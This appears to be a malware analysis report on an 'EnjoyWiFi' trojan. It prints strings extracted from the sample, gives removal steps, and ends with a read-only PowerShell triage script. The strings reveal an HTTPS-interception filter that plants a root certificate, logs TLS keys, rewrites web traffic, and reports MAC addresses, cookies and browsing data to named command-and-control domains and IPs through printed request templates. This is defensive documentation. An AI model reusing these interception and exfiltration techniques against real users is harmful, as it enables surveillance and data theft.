 (#EÚ
ÚE<<0
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
CONF_def part of OpenSSL 1.0.2h 3 May 2016
[%s] %s=%s
[[%s]]
Key Encipherment
keyEncipherment
Key Agreement
keyAgreement
Certificate Sign
keyCertSign
EXTENDED_KEY_USAGE
PKEY_USAGE_PERIOD
%*sZone: %s, User:
<unsupported>
othername:<unsupported>
X400Name:<unsupported>
EdiPartyName:<unsupported>
email:%s
DNS:%s
URI:%s
IP Address:%d.%d.%d.%d
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_akey.c
%*scrlUrl:
CERTIFICATEPOLICIES
d.cpsuri
d.usernotice
%*sCPS: %s
%*sOrganization: %s
%*sNumber%s:
%*sExplicit Text: %s
%*sPolicy Text: %s
XX
%.14s.dZ
%*sSigned Certificate Timestamp:
RAND part of OpenSSL 1.0.2h 3 May 2016
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
PROXY_CERT_INFO_EXTENSION
X:
%lu:%s:%s:%d:%s
Private-Key: (%d bit)
Public-Key: (%d bit)
Private-Key
Public-Key
%s: (%d bit)
DH Private-Key
DH Public-Key
private-key:
public-key:
recommended-private-length: %d bits
.\crypto\dh\dh_key.c
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
nkey <= EVP_MAX_KEY_LENGTH
.\crypto\evp\evp_key.c
?456789:;<=
!"#$%&'()* ,-./0123
SSLv3 part of OpenSSL 1.0.2h 3 May 2016
CLIENT_RANDOM %s %s
c:/sslkey/laskeydb.log
key expansion
client write key
server write key
%s:%d: rec->data != rec->input
j <= (int)sizeof(ctx->key)
keyfunc
keylength
ECDSA part of OpenSSL 1.0.2h 3 May 2016
.\crypto\pkcs12\p12_key.c
.\out32/.\out32/ssl/certs
.\out32/.\out32/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
ADVAPI32.DLL
KERNEL32.DLL
NETAPI32.DLL
USER32.DLL
rsa_keygen_bits
rsa_keygen_pubexp
hexkey
%s %s%lu (%s0x%lx)
ASN1 OID: %s
NIST CURVE: %s
Field Type: %s
Basis Type: %s
CMS_CertificateChoices
d.issuerAndSerialNumber
d.subjectKeyIdentifier
d.crl
certificates
keyEncryptionAlgorithm
encryptedKey
CMS_KeyTransRecipientInfo
keyAttrId
keyAttr
CMS_OtherKeyAttribute
CMS_RecipientKeyIdentifier
d.rKeyId
CMS_KeyAgreeRecipientIdentifier
CMS_RecipientEncryptedKey
CMS_OriginatorPublicKey
d.originatorKey
CMS_OriginatorIdentifierOrKey
recipientEncryptedKeys
CMS_KeyAgreeRecipientInfo
keyIdentifier
keyDerivationAlgorithm
CMS_PasswordRecipientInfo
d.ktri
d.kari
d.kekri
d.pwri
d.ori
d.signedData
d.envelopedData
d.digestedData
d.encryptedData
d.authenticatedData
d.compressedData
d.allOrFirstTier
d.receiptList
keyInfo
otherCertFormat
otherCert
CMS_OtherCertificateFormat
d.certificate
d.extendedCertificate
d.v1AttrCert
d.v2AttrCert
Load certs from files in a directory
%s%clx.%s%d
s->init_num == (int)s->d1->w_msg_hdr.msg_len   DTLS1_HM_HEADER_LENGTH
((long)msg_hdr->msg_len) > 0
invalid state reached %s:%d
s->d1->w_msg_hdr.msg_len   ((s->version==DTLS1_BAD_VER)?3:DTLS1_CCS_HEADER_LENGTH) == (unsigned int)s->init_num
s->d1->w_msg_hdr.msg_len   DTLS1_HM_HEADER_LENGTH == (unsigned int)s->init_num
retransmit: message %d non-existant
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
GOST signature length is %d
Verifying - %s
TXT_DB part of OpenSSL 1.0.2h 3 May 2016
DTLSv1 part of OpenSSL 1.0.2h 3 May 2016
NETSCAPE_CERT_SEQUENCE
ECDH part of OpenSSL 1.0.2h 3 May 2016
%s.dll
.\crypto\asn1\x_pkey.c
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
c:\sslkey\dump.log
c:\sslkey\modified.log
HTTPS
Request[%s]:original
Request[%s]:modified
Respond[%s]:original
Respond[%s]:modified
Request[%s]:original end
Request[%s]:modified end
Respond[%s]:original end
Respond[%s]:modified end
iexplore.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Http\UserChoice\
http\shell\open\command\
GetDefaultBrowserPath(), RegOpenKeyEx(%s) fail, error=%0X
GetDefaultBrowserPath(), RegQueryValueEx(%s) fail, dwType=%0X, error=%0X
GetDefaultBrowserPath(), RegQueryValueEx(%s) OK, wszBuffer=%s
NfCheckDns pid=%d, Domain=%s
NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not read for SSL, soSSL ByPass
NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not ready for SSL, soSSL ByPass, errno=%x
opera.exe
NfCheckDns process is opera.exe version=%s
[1234567890.] 
NfCheckDns IP=%s match
NfCheckDns is not ssl Try Domain=%s
NfCheckDns have try SSL Domain=%s icount=%d, match
NfCheckDns try SSL Domain=%s icount=%d
NfCheckDns Domain=%s match, i=%d
NfCheckDns Domain=%s not match
NfCheckSSLDomain pid=%d, Domain=%s
NfCheckSSLDomain IP=%s match
NfCheckSSLDomain Domain=%s match, i=%d
NfCheckSSLDomain Domain=%s not match
RefreshDns domain=%s
RefreshDns m_SSLIPMap p->Flags.DW=%x, DNSREC_AUTHORITY ip=%s
RefreshDns m_SSLIPMap.insert m_SSLIPMap ip=%s
hXXps://([^/:] ):443/(S*)
HTTP/1.1 302 Found
cdf4rz.dangyu.info
54.201.224.55
get_httpresp: connect [%s] faile
get_httpresp: connect [%s] ok
get_httpresp: try connect ip=%s
get_httpresp: send(%s) faile
GET /%s/log/err.php HTTP/1.1
Host: %s
QUDAO: %s
Agent: %s
MACS: %s
ERRIMG: %s
Cookie: %s
NfCheckRules process[%s], rmport=%d, remoteAddr=%s, iFlag=%d
HTTP/1.1 200 OK
hXXp://([^/] )/(\S*)
ProxyReq PxAct=%s
ProxyReq PxAct=Fellow, URL=%s
ProxyReq PxAct=Fellow, headers=%s
ProxyReq PxAct=Fellow, RespToMSTCP httpresp=%.*s
PxyRspUrl
ProxyReq PxyRsp, PxyRspUrl=%s
Post_PxyRsp , PxyRspUrl=%.*s
[NF]rule[%d][%s], format=%.*s not support %%*,n
[NF]rule[%d][%s], format=%.*s [%d,%d] over range!!!!
[NF]rule[%d][%s], format=%.*s [%d,%d] not exist!!!!
nurl
toexe.filename
toexe.args
nrspurl
rw_rule[%d]: iTimes[%d] - rw_checktime[%d] >= rw_rule[%d].rw_fttime[%d]
rw_rule[%d]: iTimes[%d] >= GlobalVars::gst_rw_rule[%d].iLimits[%d]
CheckGetType rw_rule[%d] rw_conds[%d] is not Match, but refered!!!!
rr_rule[%d]: iTimes[%d] >= GlobalVars::gst_rr_rule[%d].iLimits[%d]
[NF]Replace rule[%d], format=%.*s [%d,%d] not exist!!!!
CheckRRType rorgcap[%d][%d]=%.*s!
ReqRep icond=%d: HS_STATUS[ilen=%d]:%.*s
ReqRep icond=%d: HS_HEAD[%s]:%s
ReqRep icond=%d: HS_CONTENT:%.*s
ReqRep Header.toSting()=%s
ReqRep[request_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s
ReqRep[request_regrsp] icond=%d: HS_HEAD[%s]:%s
ReqRep[request_regrsp] icond=%d: HS_CONTENT:*s
ReqRep finished: HS_STATUS:%s
GET /%.*s HTTP/1.1
User-Agent: Mozilla/5.0 (gid %s; cid %s)
get_httpresp: start!!, url=%.*s, headers=%s
get_httpresp: sendbuf=%s
get_httpresp: domain=%s
POST /%.*s HTTP/1.1
post_httpresp: start!! url=%.*s, headers=%s, postbody=%s
post_httpresp: sendbuf=%s
post_httpresp: domain=%s
%s size too small , the value=%.*s
g_debug=%d
g_charorg=%s
g_charmap=%s
g_exclude[%d]=%s
g_download [%d]= %s %d %s
g_precmd
([WwTt][SsHh])\s (\d )\s "([^"]*)"\s ([^\r\n]*)
g_precmd [%d]= %d %d %s %s
g_postcmd
g_postcmd [%d]= %d %d %s %s
g_postproinfo=%d
g_limflagip=%s
g_maxnet=%d
g_muteip=%s
g_rrurl
g_rrurl valus=[%.*s]!
g_irrecd valus=[%.*s]! GlobalVars::g_irrecd=%d
g_imaxrcv valus=[%.*s]! GlobalVars::g_imaxrcv=%d
g_bFilterSSL=%d
g_rootm_x509URL
g_rootm_x509URL valus=[%.*s]!
g_rootm_pkeyURL
g_rootm_pkeyURL valus=[%.*s]!
g_rootm_x509Len=%d
g_rootm_pkeyLen
g_rootm_pkeyLen=%d
g_rootm_subject=%s
g_blockspdy=%d
g_rootm_x509RegURL
g_rootm_x509RegURL valus=[%.*s]!
g_sslkey
g_sslkey valus=[%.*s],expanded keyfile=%s!
g_rootm_x509RegLen=%d
g_tjdefbrowser=%d
g_tjssldomain=%d
g_rptsslrdy=%d
g_sslbrowser=%s
g_ssltrybrowser=%s
g_ssldomain2ip=%d
g_heartbeat=%d
nf_rule GlobalVars::i_rules=%d, domain=%s
gethostbyname(%s) error
nf_rule GlobalVars::i_rules=%d, domain=%s be resolved
rw_id valus=[%.*s] crw_rule.rw_id=%d
rw_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
rw_act valus=[%.*s]! crw_rule.rw_act=%d
rw_tounzip valus=[%.*s]! crw_rule.tounzip=%d
rw_psturl
rw_psturl valus=[%.*s]!
rw_limit valus=[%.*s] crw_rule.iLimits=%d
rw_arfi already exist index[%d]=%s!
rw_arfi dont exist index[%d]=%s, filename=%.*s!
rw_arfi new one index[%d]=%s!
rw_nurl
rw_nurl valus=[%.*s]!
rw_groupid valus=[%.*s] > MAX_GROUPS reset crw_rule.groupid=%d
rw_groupid valus=[%.*s] crw_rule.groupid=%d
rw_ckid valus=[%.*s] crw_rule.rw_ckid=%d
rw_fttime valus=[%.*s] crw_rule.rw_fttime=%d
rw_act valus=[%.*s]! crw_rule.rw_checktimemode=%d
rw_execmd
rw_execmd = %d %d %s %s
rw_map[%d] [%s] ==> [%s]!
nf_rule m_dnsrules.insert(%s)
nf_rule m_dnsset.insert(%s)
nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%s
nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%d.%d.%d.%d
nf_dns GlobalVars::gi_dns=%d, match rules=%s, resolve ip=%d.%d.%d.%d
icur_rrrule=%d, iget_conds=%d, rq_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
icur_rrrule=%d, irsp_conds=%d, rr_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
rr_act valus=[%.*s]! crw_rule.rr_act=%d, g_rrmode=%d
rr_rspurl
rr_rspurl valus=[%.*s]!
rr_tounzip valus=[%.*s]! crr_rule.rw_tounzip=%d
certinfo.daysValid=%d
certinfo.sigType=%d
certinfo.subject.commonName=%s
certinfo.subject.country=%s
certinfo.subject.email=%s
certinfo.subject.friendName=%s
certinfo.subject.locality=%s
certinfo.subject.org=%s
certinfo.subject.state=%s
certinfo.subject.sur=%s
certinfo.subject.unit=%s
pf_insertCADns(%s,%s)
VerifyCertContent fail, sleept=%d, give up
VerifyCertContent fail, sleept=%d
Process_Config get x509[%s], ntStatus=%d, lssl=%d
Process_Config get pkey[%s], ntStatus=%d, lssl=%d
cdf4pz.dangyu.info
cdf4pz.insearchs.com
hXXp://%s:%d/%s/adobe.com/config.php
09:18:02
MAC: %s
BT: %s %s
Proc: %s
PathUnExpandEnvStrings %s fail
CreateFile %s faile, errno=%d
hXXp://
rw_rsps[%d]:%.*s
reps=%.*s, isBackRef=%d
refcap[%d][%d] malloc:%.*s
processReceive[respond_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s
processReceive[respond_regrsp] icond=%d: HS_HEAD[%s]:%s
processReceive[respond_regrsp] icond=%d: HS_CONTENT:*s
processRReceive rsps[%d]->ePF == HS_HEADER, find Header[%s], length=%d
processReceive rsps[%d]->ePF == HS_HEADER, find Header[%s]
processReceive rsps[%d]->ePF == HS_CONTENT/HS_STATUS, iLen=%d, content=%.*s
processRReceive %%d,d reps =%.*s
processRReceive not %%d,d reps =%.*s
processRReceive reps=%.*s isBackRef=%d
processRReceive rw_rsps[%d] match cap=%.*s
processRReceive i=%d rw_rsps cap=%.*s,%%%d^%%%d
processRReceive i=%d rrsp_conds cap=%.*s,%%%d^%%%d
ReportRecord: iformat=%d, format=%.*s
processRReceive 8 pTcpNE->rorgcap[1][0]=%.*s
ReportRecord irrule=%d, icond=%d, igroup=%d, rorgcap=%.*s, len=%d, record=%.*s, len=%d
ReportRecord: 2 iformat=%d, format=%.*s
ReportRecord irrule=%d, record=%.*s, ilen=%d
ReportRecord: 3 iformat=%d, format=%.*s
ReportRecord: 4 iformat=%d, format=%.*s
ProcRR, ReportRecord len=%d, buff:%.*s
ProcRR sendrpt %s
CheckGetType(id=%I64u) gettype= %d
rrtype= %d
{"browser":"%s","conn":"%s=>%s","httperr":"RspUncompress fail,rt=%d"}
httperr %s
()$^.* ?[]|\-{},:=!
threadStart id=%d
NfCheckRules (id=%I64u) localport=%d, localAddr=%s, rmport=%d, remoteAddr=%s, iFlag=%d
{"browser":"%s","ssltry":"FAIL"}
LogSSLTryBrowser %s
{"browser":"%s","ssltry":"OK"}
{"browser":"%s","conn":"%s=>%s","domain":"%s"}
LogSSLDomain %s
dataPartAvailable OT_SSL_HANDSHAKE_OUTGOING rt=%d, hostname=%.*s
{"browser":"%s","sslerr":"%s"}
LogSSLException %s
have %s
VVV.baidu.com
VVV.google.com
VVV.126.com
%s.tmp
downloadfile[%s] fail
1.3.6.1.5.5.7.3.1
1.3.6.1.4.1.311.10.3.3
2.16.840.1.113730.4.1
nf_getProcessName=%s, pproc=%s
resolve wmi_dirip[%s]=%s OK
%.4d%.2d%.2d %.2d:%.2d:%.2d:%d
nf_getDisplayFromKernel g_MACs=%s
getMACInfo %s
{"defbrowser":"%s","version":"%s"}
heartbeat upt=%d minutes
tfpf stop, isnfinit=%d, ispfinit=%d, bIsFaile=%d, living time=%d!
{"ImageBase":"%0X","ImageSize":"%u","buildNumber":"%u"}
HTTP/1.
http/1.
Wtsapi32.dll
SSL\SSLDataProvider.cpp
%s-%s#ss
%s-%s-%s#child
{"browser":"%s","conn":"%s=>%s","domain":"%s","msg":"%s"}
127.0.0.1
SSLFilter.cpp
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() getSelfSignedCert(test) failed
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() sdTemp.init failed
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() bypass exception
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() Weak DH prime, do not filter such connections
__FILE__:%s, __LINE__:%d, addTlsException(TLS_ALL_CIPHERS)
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, getSelfSignedCert fail
__FILE__:%s, __LINE__:%d, getSignedCert fail
__FILE__:%s, __LINE__:%d, m_sdLocal.init fail
__FILE__:%s, __LINE__:%d, BIO_write fail
__FILE__:%s, __LINE__:%d, SSL_accept(m_sdLocal.m_pSSL) fail, err=%d
__FILE__:%s, __LINE__:%d, SSL_get_peer_certificate fail
__FILE__:%s, __LINE__:%d, SSL_accept fail, err=%d
__FILE__:%s, __LINE__:%d, SSLRead_client, err=%d
__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE, len == 0
__FILE__:%s, __LINE__:%d, SSL_accept fail, n=0
__FILE__:%s, __LINE__:%d, SSLRead_server, n=%d
__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE_REQUEST_CLIENT_CERT, n=0
__FILE__:%s, __LINE__:%d, SSLRead_client, n=%d
__FILE__:%s, __LINE__:%d, SSL_accept, err=%d
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), err=%d
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), n=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLFilter::tcp_packet() bypass exception
surfeasy.com
opera-proxy.net
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, host is surfeasy.com or opera-proxy.net
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) err=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) n=0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write fail
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLRead_client(m_sdRemote) fail
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) fail, errno=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) fail, errno=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write < 0
PORT
504 Unsupported transfer mode
504 Unsupported command
PORT
%s.%s.%s.%s:%d
%s:%s
[%s]:%s
File-Count: %d
Total-Bytes: %d
File-Name: %s
{0946134E-4C7F-11D1-8222-444553540000}
|.^$* ?()[\
(Windows%d.%d.%d)
SYSTEM\CurrentControlSet\Services\%s
NBMediaInfo_Adv.ini
%s\system32\%s
NBMediaInfo_Adv.ini;
0.0.0.0
%s:xxxxxx|
1.0.1.0
%d.%d.%d.%d
WARNING: %s failed with error %d (%s)
cdf4ps.dangyu.info
GET /xcldnfpf/log/proclog.php HTTP/1.1
get_httpresp: send(%s) ok
CreateProcessAsUser(%s %s ) fail errno[%d]
WinExecAndWait32(%s %s ) timeout[%d]
H:\nfsdk-src-1.5.1.4-pf-src-1.1.6.8\bin\Release\Win32\PFHttpContentFilter.pdb
PFHttpContentFilter.dll
GetWindowsDirectoryA
KERNEL32.dll
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
PSAPI.DLL
WS2_32.dll
DNSAPI.dll
CertCreateCertificateContext
CertFreeCertificateContext
CertGetCertificateChain
CertFreeCertificateChain
CertOpenStore
CertAddEncodedCertificateToStore
CertVerifyCertificateChainPolicy
CertCloseStore
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertFindCertificateInStore
CertAddCertificateContextToStore
PFXExportCertStoreEx
CRYPT32.dll
IPHLPAPI.DLL
VERSION.dll
GetProcessHeap
GetCPInfo
PeekNamedPipe
USER32.dll
ReportEventA
OLEAUT32.dll
l}C.we
zcÁ
.?AVHttpFilter@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
Inappropriate I/O control opera
C:\Windows\Explorer.EXE
A12E34F2742C243943B043CFE09BBD23.tmp
54.190.23.82
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
combase.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
2.exe
\*.cer
\trec.tmp
\x.tmp
\xtls.tmp
\xv.tmp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    csc.exe:2736
    csc.exe:1596
    csc.exe:2384
    setup.4.15.f.exe:1656
    enjoyWIFI.exe:892
    enjoyWIFI.exe:4004
    enjoyWIFI.exe:3396
    cvtres.exe:4000
    cvtres.exe:576
    cvtres.exe:1376
    enjoyWIFI.tmp:1056
    starter.exe:1084

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.dll (4304 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (396 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC114E.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (396 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.dll (2490 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC1074.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC29F.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (396 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.dll (3662 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\System.dll (23 bytes)
    %Program Files%\EnjoyWiFi\inst.db (5 bytes)
    %Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
    %Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
    %Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
    %Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
    C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
    C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
    %Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\wftinst.dll (29506 bytes)
    C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
    %Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
    %Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
    %Program Files%\EnjoyWiFi\zlib.dll (925 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\11f03f3e47a7458cb81a3a1441eae3c0\starter.exe (185379 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.0.cs (676 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\513488b4c2f64a4a9f5a9d95e2668ace\enjoyWIFI.exe (202246 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.0.cs (1444 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.0.cs (5572 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\66c296f3ee214b3e99a092c71c51c3c0\enjoyWIFI.exe (205485 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00005786\setup.4.15.f.exe (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-RP795.tmp\enjoyWIFI.tmp (1832 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp\enjoyWIFI.tmp (1832 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES114F.tmp (3666 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES1075.tmp (3666 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2A0.tmp (3658 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_RegDLL.tmp (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\HelpTool.dll (8020 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_RegDLL.tmp (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\HelpTool.dll (8020 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\enjoyWIFI.exe (15262 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\rsl2960.tmp (1 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    "%original file name%.exe" = "c:\%original file name%.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
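The PIDs listed in step 2 are those of the sandbox run and will differ on any other host, so a practitioner checking a machine should match on image names and file paths instead. The following PowerShell triage script is an added example, not part of the Lavasoft report and not code from the sample; it only reports, it does not delete anything, so the removal steps above still apply. It checks the processes, dropped files, kernel driver and RunOnce value named in this report. Two items are assumptions rather than facts from the report: the service name "wfcre" (inferred from the dropped wfcre.sys and the "SYSTEM\CurrentControlSet\Services\%s" string), and the root-certificate check (inferred from the strings g_rootm_x509URL, g_rootm_subject, CertAddCertificateContextToStore and SSLFilter.cpp, which point to an SSL-interception filter that needs its own CA in the trusted root store).

```powershell
# Added triage script for the artifacts listed in this report.
# Read-only: it prints findings and leaves removal to the steps above.
$ErrorActionPreference = 'SilentlyContinue'
$findings = @()

# 1. Processes from the report, matched by image name (sandbox PIDs are not reusable).
$procNames = @('enjoyWIFI', 'starter', 'setup.4.15.f')
foreach ($p in Get-Process | Where-Object { $procNames -contains $_.Name }) {
    $findings += "[process] $($p.Name) pid=$($p.Id) path=$($p.Path)"
}

# 2. Dropped files and directories taken from the report's file list.
$paths = @(
    "$env:ProgramFiles\EnjoyWiFi",
    "${env:ProgramFiles(x86)}\EnjoyWiFi",
    "$env:SystemRoot\System32\drivers\wfcre.sys",
    "$env:PUBLIC\Documents\XMUpdate\conf.db",
    "$env:PUBLIC\Desktop\EnjoyWiFi.lnk",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi",
    "$env:LOCALAPPDATA\InstallationConfiguration.xml",
    "$env:LOCALAPPDATA\installer.dat"
)
foreach ($path in $paths) {
    if (Test-Path -LiteralPath $path) { $findings += "[file] $path" }
}

# 3. Driver service. ASSUMPTION: the service is named after the dropped driver (wfcre.sys);
#    the report does not state the service name.
$svc = Get-Service -Name 'wfcre'
if ($svc) { $findings += "[service] wfcre status=$($svc.Status)" }
$drv = Get-Item -LiteralPath "$env:SystemRoot\System32\drivers\wfcre.sys"
if ($drv) {
    $sig = Get-AuthenticodeSignature -FilePath $drv.FullName
    $findings += "[driver] wfcre.sys signature=$($sig.Status) signer=$($sig.SignerCertificate.Subject)"
}

# 4. RunOnce: the report shows the original sample registering itself here under its own
#    file name, so every value in the key is listed for review rather than one fixed name.
$runOnce = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
if ($runOnce) {
    foreach ($prop in $runOnce.PSObject.Properties) {
        if ($prop.Name -notlike 'PS*') { $findings += "[runonce] $($prop.Name) = $($prop.Value)" }
    }
}

# 5. Trusted root certificates added recently. ASSUMPTION: an SSL-interception filter
#    installs its own self-signed CA; the report's strings suggest this but do not list
#    the subject, so the heuristic is "self-signed root issued on or after the sample's
#    build date (2017-10-03)". Review each hit manually before removing it.
$since = [datetime]'2017-10-03'
foreach ($cert in Get-ChildItem -Path 'Cert:\LocalMachine\Root', 'Cert:\CurrentUser\Root') {
    if ($cert.Subject -eq $cert.Issuer -and $cert.NotBefore -ge $since) {
        $findings += "[rootca] $($cert.PSParentPath.Split('::')[-1]) thumbprint=$($cert.Thumbprint) subject=$($cert.Subject) notBefore=$($cert.NotBefore)"
    }
}

if ($findings.Count -eq 0) { 'No artifacts from this report found.' } else { $findings }
```

Run it from an elevated PowerShell prompt so that the LocalMachine certificate store and the drivers directory are readable. A hit in the [rootca] section matters more than the others: deleting the files and the driver stops the filter, but a leftover CA in the root store keeps the machine willing to trust any certificate the operator can sign, so it should be removed from Cert:\LocalMachine\Root (or the CurrentUser store) after confirming it is not a legitimate corporate or product CA.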
